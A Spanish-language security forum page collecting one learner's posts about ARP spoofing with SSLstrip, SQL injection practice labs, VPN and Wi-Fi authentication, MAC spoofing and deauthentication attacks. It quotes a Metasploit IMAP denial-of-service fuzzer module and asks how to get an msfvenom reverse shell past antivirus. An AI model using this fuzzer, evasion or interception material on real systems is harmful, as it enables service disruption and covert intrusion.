Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - nexusz

#21
Buenas,estoy practicando en mi maquina virtual los ataques arp spoofing con ssltrip+ hsts, para eso uso el programa MITMF, pero hay un problema cuando lanzo el ataque hasta ahi todo bien pero cuando voy a la maquina victima intento entrar en algun sitio web para ver si bypasseo https, veo que no tuvo efecto el ataque y se me pone lenta la conexion del equipo victima,cuando me fijo en la maquina atacante veo que en el programa mitmf sale el siguiente error:[dns] could not proxy request:time out
como que no hace la resolucion de dns cierto?
les dejo una imagen del error

desde ya gracias
un saludo
#22
Buenas,queria hacerles una consulta existen ataques a los protocolos de enrutamientos? porque me puse a buscar por internet y la verdad encontre muy poca info,solamente de RIPv1, nisiquiera videos nada,alguno que este avanzado con el tema seguridad en redes me puede ayudar?
desde ya gracias
un saludo
#23
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¡Hola!

Como bien decís, en el foro hay bastantes, son básicos (algunos no), pero son sencillos de entender.

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta hizo un tutorial básico sobre SQLi y Blind SQLi, ¡son muy buenos!

Y si querés "un paso más", para cuando estés más avanzado, @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta tiene un blog donde podés encontrar muchisimo contenido sobre SQLi (métodos avanzados).

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
gracias, si lei el tuto de ANTRAX pero hay cosas q no las tengo muy clara, por ejemplo me baje sqli-labs para practicar pero hay cosas que no entiendo por ejemplo GET – Error-Based – Single Quotes – String, GET – Error-Based – Integer-Based,Error-based double quotes string, Fixing the query without using comments, porque se llama asi? en ningun lugar encontre que me explique como funiona asi sql injection.
tambien me baje dvwa para practicar el sql injection de nivel medio noentiendo porque tiene que poder un 99 para que funcione o porque agregando el comentario # funciona y poniendo el comentario --+ no funciona

No pude postearlo en texto quiza lo detecta el Cloudflare!, pero te paso el texto en imagenes xD




Cualquier cosa puedes comentar intentare solucionar tus dudas, Saludos!
gracias :) me podrias pasar el post completo del tuto?
#24
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¡Hola!

Como bien decís, en el foro hay bastantes, son básicos (algunos no), pero son sencillos de entender.

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta hizo un tutorial básico sobre SQLi y Blind SQLi, ¡son muy buenos!

Y si querés "un paso más", para cuando estés más avanzado, @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta tiene un blog donde podés encontrar muchisimo contenido sobre SQLi (métodos avanzados).

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
gracias, si lei el tuto de ANTRAX pero hay cosas q no las tengo muy clara, por ejemplo me baje sqli-labs para practicar pero hay cosas que no entiendo por ejemplo GET – Error-Based – Single Quotes – String, GET – Error-Based – Integer-Based,Error-based double quotes string, Fixing the query without using comments, porque se llama asi? en ningun lugar encontre que me explique como funiona asi sql injection.
tambien me baje dvwa para practicar el sql injection de nivel medio noentiendo porque tiene que poder un 99 para que funcione o porque agregando el comentario # funciona y poniendo el comentario --+ no funciona
#25
Buenas,queria preguntarles donde puedo conseguir un libro o articulos sobre sql injection completo porque vi algunos en el foro pero son muy basicos y hay un unos sql injection que se aplican pero noentiendo porque se aplica asi(no se si me entienden).

desde ya gracias
#26
Dudas y pedidos generales / Dudas sobre redes
Junio 27, 2016, 05:12:34 AM
Buenas,estoy estudiando redes y tengo varias dudas,voy por la primera.
PSK clave precompartida:dice que comparte la clave tanto el AP como el cliente cierto? pero que clave comparte, la contraceña de la red o las llaves criptograficas?.

La segunda el protocolo de autenticacion EAP dice que se usa para servidores radius u otros, se usa para comunicarse y permitir la autenticacion con cualquier servidor 802.1x pero como funciona internamente, por desafio-respuesta como ms-chap? porque busque y no encuentro informacion clara.

Otra duda sobre PAP,CHAP,EAP,EAP-TLS,etc son todos protocolos de autenticacion?.

Otra duda es como funciona la autenticacion de radius con el autenticador y el suplicante?porque por lo que he visto radius usa desafio-respuesta.

la autenticacion por psk funciona asi:
CitarLa estación que quiere autenticarse (cliente), envía una trama AUTHENTICATION REQUEST indicando que quiere utilizar una "clave compartida". El destinatario (AP) contesta enviando una trama que contiene 128 octetos de texto (desafío) al cliente
El texto del desafío se genera utilizando el PRNG (generador de números pseudoaleatorios de WEP) con la clave compartida y un vector de inicialización (IV) aleatorio.
Una vez el cliente recibe la trama, copia el contenido del texto de desafío en el payload de una nueva trama, que encripta con WEP utilizando la clave compartida (passphrase) y añade un nuevo IV (elegido por el cliente). Una vez construida esta nueva trama encriptada, el cliente la envía al AP, y éste desencripta la trama recibida y comprueba que:
- El ICV (Integrity Check Value) sea valido (CRC de 32 bits).
- El texto de desafío concuerde con el enviado en el primer mensaje.

Si la comprobación es correcta, se produce la autenticación del cliente con el AP y entonces se vuelve a repetir el proceso pero esta vez el primero que manda la trama con el AUTHENTICATION REQUEST es el AP. De esta manera se asegura una autenticación mutua

ese desafio que le manda al cliente con la clave precompartida, a que hace referencia eso, a una llave criptografica o a la contraseña de la red?


Desde ya gracias ;D
un saludo a todos
#27
Dudas y pedidos generales / Re:Duda sobre VPN
Junio 05, 2016, 06:15:08 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Diferencias entre PPTP y L2TP/IPSec
La principal desventaja de PPTP cuando se compara con L2TP/IPSec es la fuerza del cifrado (si quieres saber qué es la fuerza del cifrado y por qué deberías tenerlo en cuenta, lee esto).
La máxima fuerza de cifrado del PPTP usando Microsoft Point-to-Point Encryption (MPPE) es 128bit. IPSec puede ofrecer un cifrado mucho más fuerte, con claves más actualizadas. Típicamente (en nuestro caso), la clave usada será AES con 128bit.
Además, L2TP ofrece integridad de datos (protección contra modificación de los datos durante el plazo transcurrido desde que dejan al remitente y llegan al recipiente), autentificación de origen (confirmación de que el usuario que pretende haber enviado los datos es realmente quien los envió) y protección contra reproducción (que impide que un hacker pueda capturar los datos enviados, como por ejemplo credenciales, y luego "reproducirlas" para "engañar" al servidor). PPTP no puede ofrecer ninguna de estas prestaciones.
Debido a las prestaciones de seguridad adicionales proporcionadas por L2TP/IPSec, podría pasar que la velocidad fuera ligeramente más lenta que cuando se usa PPTP. Pero la diferencia de velocidad apenas se nota en la mayoría de los casos.
PPTP puede ser usado muy rápida y fácilmente, porque lo soportan la mayoría de sistemas operativos. L2TP/IPSec, aunque es también fácil de usar, no cuenta con un soporte tan extendido y puede presentar un poco de dificultad.
Finalmente, L2TP/IPSec es más "compatible con firewall" que PPTP, lo que significa que tiene más oportunidades de funcionar cuando no hay soporte para PPTP, o cuando está bloqueado.

Resumen
Si tu prioridad es la seguridad, definitivamente deberías usar L2TP/IPSec. Además, será tu única opción cuando PPTP esté bloqueado o no sea soportado por los ISP. Si quieres una solución rápida, fácil de usar y que funcione en la mayoría de dispositivos, PPTP es la opción que te recomendamos.


Comparación de protocolos de VPN: PPTP frente a L2TP
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Muchas gracias por la respuesta,me quedo otra duda como trabaja IKE en IPsec y que es conmutacion en redes y que tipos hay, porque lo lei en varios libros,sitios pero esta en un idioma muy tecnico y no lo entiendo jeje.

desde ya gracias
#28
mira yo no trabaje todavia estoy estudiando, pero se que los expertos en seguridad informatica hay pocos y son muy buscados, en lo que es informatica dicen q son uno de los que mejores ganan,mira chema alonso,cerrudo,tipos grosos en esto son empresarios pero hay q trabajar duro promocionar tu empresa en las conferencias como ekoparty defcon .
#29
Dudas y pedidos generales / Duda sobre VPN
Junio 01, 2016, 09:28:12 PM
Buenas,estoy aprendiendo teoria sobre vpn pero la verdad que tengo todos los conocimientos desordenados,GRE porque se usa en pptp y no l2tp? PPP es un protocolo de autenticacion y hay otros como PAP, SPAP, CHAP, MS-CHAP / MS-CHAPv2 y EAP-TLS? ipsec es un protocolo de seguridad como MS-CHAPv2 ? se los conceptos de cada cosa pero tengo toda la informacion desordenada la verdad, no se puede usar pptp con ipsec?

gracias por su ayuda y un saludo
#30
Dudas y pedidos generales / Evadir Antivirus
Mayo 29, 2016, 06:15:04 PM
Buenas,genere una shell reverse_tcp con msfvenom, pero veo que me la detecta casi todos los antivirus,estoy viendo como evadir los av,pero no encuentro una solucion,proble con shellter pero me daña al shell no me la ejecuta,el hanzoinjected cuando lo ejecuto me dice que no es una aplicacion valida en win32 cosa q me parece re raro, probe con SET toolkit pero me la detecta todo los antivirus,la verdad no se con que programa probar,alguno me puede dar una mano?

desde ya gracias un saludo
#31
Buenas,estoy haciendo el curso de metasploit de ofensive security,queria agregar un fuzzer para imap que es el siguiente codigo:
Código: php
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 > Msf::Auxiliary

    include Msf::Exploit::Remote::Imap
    include Msf::Auxiliary::Dos

    def initialize
        super(
            'Name'           => 'Simple IMAP Fuzzer',
            'Description'    => %q{
                                An example of how to build a simple IMAP fuzzer.
                                Account IMAP credentials are required in this fuzzer.
                        },
            'Author'         => [ 'ryujin' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 1 $'
        )
    end

    def fuzz_str()
        return Rex::Text.rand_text_alphanumeric(rand(1024))
    end

    def run()
        srand(0)
        while (true)
            connected = connect_login()
            if not connected
                print_status("Host is not responding - this is G00D ;)")
                break
            end
            print_status("Generating fuzzed data...")
            fuzzed = fuzz_str()
            print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)
            req = '0002 LIST () "/' + fuzzed + '" "PWNED"' + "\r\n"
            print_status(req)
            res = raw_send_recv(req)
                if !res.nil?
            print_status(res)
                else
                    print_status("Server crashed, no response")
                    break
                end
            disconnect()
        end
    end
end


lo guardo en formato .rb y lo copio en la carpeta de metasploit en la siguiente ruta: auxiliary/dos/windows/imap/
y ejecuto metasploit pongo el siguiente comando: use auxiliary/dos/windows/imap/nombredemifuzzer.rb
y me dice q fallo el modulo como que no lo reconoce.que puede ser?

desde ya gracias
#32
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Como bien dice su nombre, el ataque en cuestión se basa en enviar de forma masiva tramas de desautenticación a los clientes, de tal forma que estos al recibirla la ejecutarán y se desconectarán de la red wifi automáticamente...Estas tramas son uno de los procesos utilizados por el protocolo 802.11 y la mayoría de sus variantes, por lo tanto, cualquier dispositivo que los tenga instalado y los utilice (todos los dispositivos con wifi) aceptarán las tramas de desautenticación y las ejecutará...

Para ejecutar el ataque se podrá hacer con las herramientas "airmon-ng", "airdump-ng" y "aireplay-ng".

Saludos

y yo podria crear un programa que las envie?
#33
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
El problema es que no tienes ninguna interfaz o no la detecta. ¿Te conectas por cable o por WiFi?

Configura el archivo /interfaces de la siguiente forma:

# auto eth0
# iface eth0 inet static
#     address 192.168.0.42
#     network 192.168.0.0
#     netmask 255.255.255.0
#     broadcast 192.168.0.255
#     gateway 192.168.0.1

Nota: lo que está en rojo es la interfaz, si usas WiFi pon "wlan0", y además escoge el rango de IP correcto (mira antes haciendo un ifconfig.

Saludos
Muchaas gracias :), otra pregunta perdona q sea tan molesto jaja, que son los paquetes de desautenticacion? que tipo de protocolo utiliza y como es su cabecera porque estuve investigando y en ningun lugar te explica esas cosas.
#34
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¿La interfaz es la correcta? Tipea "iwconfig" para ver todas las interfaces.

Detén la interfaz y vuelve a reanudarla:

# ifdown wlan0
# ifup wlan0

Sino revisa el archivo de /networking/interfaces que no tengas nada extraño configurado o bien lo configuras tu manualmente asignado una dirección IP fija.

# cat /etc/network/interfaces

Para terminar haz un reset de las interfaces:

# /etc/init.d/networking restart

tipeo iwconfig y me sale lo siguiente:
lo        no wireless extensions.

eth0      no wireless extensions.

probe tipeando ifconfig eth0 down y dsp up pero nada sigue tirando el mismo error

despues puse en la consola cat /etc/network/interfaces

y me salio lo siguiente
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

source /etc/network/interfaces.d/*

# The loopback network interface
auto lo
iface lo inet loopback

probe tambien reiniciando las interfaces pero nada sigue igual =S
#35
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Te crea una nueva interfaz virtual.

Puedes hacerlo también en modo gráfico instalando:

Código: bash
sudo macchanger-gtk

Gracias por la ayuda, ahora se me presento otro problema jaja,quiero poner la tarjeta en modo monitor con airmon-ng y pongo el siguiente comando sudo airmon-ng eth0 start y me da el siguiente error:
no se puede acceder a /sys/class/ieee80211/: No existe el fichero o el directorio

probe tambien bajando la interfaz con ifconfig eth0 down pero tampoco funciona, probe con iwconfig
con el siguiente comando:
iwconfig eth0 mode monitor
y me da el siguiente error:Error for wireless request "Set Mode" (8B06) :
    SET failed on device eth0 ; Operation not supported.
que puede ser?
#36
Buenas, devuelta yo jaja estoy plagado de errores esta vez es metasploit, lo tengo en dos maquina virtuales y me fallan los modulos, escribo:
use auxiliary y me salta el siguiente error:[-] Failed to load module: auxiliary
en las dos maquinas virtuales me salta ese error tambiem probe poniendo use exploits y el mismo error salta,lo descargue en windows en mi maquina de escritorio probe, salta el mismo error, que puede ser?

desde ya gracias
un saludo
#37
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¿Cómo que se te cambio las interfaces? Dime con que distro lo estás haciendo y te ayudaré, aunque en principio configurando el archivo "/etc/network/interfaces" lo podrás configurar manualmente.

Un saludo
hola estoy en una distro debian,reincie la pc y las interfaces vuelven a la normalidad,pero se cambia el nombre de la interfaz cuando pongo airmon-ng wlan0 start, en kali linux pude cambiar la mac sin problemas
#38
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Se puede observar que es por falta de privilegios, pero en cambio veo que los comandos los escribes con "sudo". Se me ocurre una cosa, y es que no lo estés haciendo en la interfaz correcta (en este caso usas wlan0).

Sigue estos otros pasos:

# sudo su //para ponerte como super usuario y olvidarte del sudo en cada comando
# airmon-ng // para ver las tarjetas (wlan0, wlan1, eth0 o la que tengas)
# airmon-ng stop wlan0 // para desactivar la interfaz
# ifconfig wlan0 down
# macchanger --mac 00:11:22:33:44:55 wlan0 // para cambiar la MAC
# airmon-ng start wlan0 // para volver habilitar la tarjeta
hice eso y se me hizo un desastre se me cambio el nombre de la interfaz, no me cambio la mac y me dejo sin internet en la pc=S
#39
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
MAC spoofing es una técnica para cambiar la dirección MAC de un dispositivo de red. La dirección MAC está codificada en una tarjeta de red y no se puede cambiar. Sin embargo, existen herramientas que pueden hacer creer al sistema operativo el uso de otra dirección MAC.

¿Para que puede ser utilizado?
Algunas redes WiFi usan el filtrado de direcciones MAC con el fin de evitar el acceso no deseado, es por eso que esta técnica permitiría suplantar la identidad de un dispositivo que SÍ tiene acceso a esta Red WiFi.

Otro ejemplo donde se puede llegar a utilizar es en Softwares donde hay direcciones MAC predefinidas según lo indicado en el contrato de licencias de software. Si el usuario tiene que instalar un hardware diferente debido al mal funcionamiento del dispositivo original o si hay un problema con la tarjeta de red del usuario, el software no reconocerá el nuevo hardware. Sin embargo, este problema se puede resolver utilizando MAC spoofing.

Un caso bastante habitual es que nuestro ISP no permitia el acceso a Internet a ciertos dispositivos, o no deje visitar según que páginas webs. Esto se puede evitar fácilmente mediante la suplantación de dirección MAC. El cliente sólo tiene que suplantar la dirección MAC del nuevo dispositivo con la dirección MAC con la que fue registrado por el proveedor de Internet.
con un arp spoofing se podria visitar sitios que el isp no deje acceder?ya que vos sos tambien la ip que tiene acceso a esa web aunque tenga diferente mac?
#40
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
El ARP Spoofing o envenenamiento de tablas ARP, es una técnica de hacking usada para infiltrarse en una red, con el objetivo de que un atacante pueda husmear los paquetes de datos que pasan por la LAN (red de área local), modificar el tráfico, o incluso detenerlo.

Mediante este tipo de ataques, se puede obtener información sensible de una víctima que esté en la misma red que el atacante, como nombres de usuario, contraseñas, coockies, mensajes de correo y mensajería instantánea, conversaciones VoIP, etc.

El envenenamiento de las tablas ARP consiste básicamente en inundar la red con paquetes ARP indicando que la nuestra es la MAC asociada a la IP de nuestra víctima y que nuestra MAC está también asociada a la IP del router (puerta de enlace) de nuestra red. De este modo, todas las máquinas actualizaran sus tablas con esta nueva información maliciosa. Así cada vez que alguien quiera enviar un paquete a través del router, ese paquete no será recogido por el router, sino por nuestra máquina, pues se dirige a nuestra dirección MAC, y cada vez que el router u otra máquina envíe un paquete a nuestra víctima sucederá lo mismo. Como nuestra máquina sabe que "está haciendo trampas" no se auto envenenará y sí conocerá las MACs reales de todas sus víctimas, por lo que la podremos configurar para que reenvíe esos paquetes a su verdadero destinatario, así nadie notará que nos hemos metido en medio (Man-in-the-middle)

Ahora que todos los paquetes que nos interesan pasan por nuestra máquina podremos usar una aplicación analizadora de paquetes (sniffer) como Wireshark para ver su contenido y usarlo con buenos o malos propósitos.

y con un MAC Spoofing que ataques se podria hacer?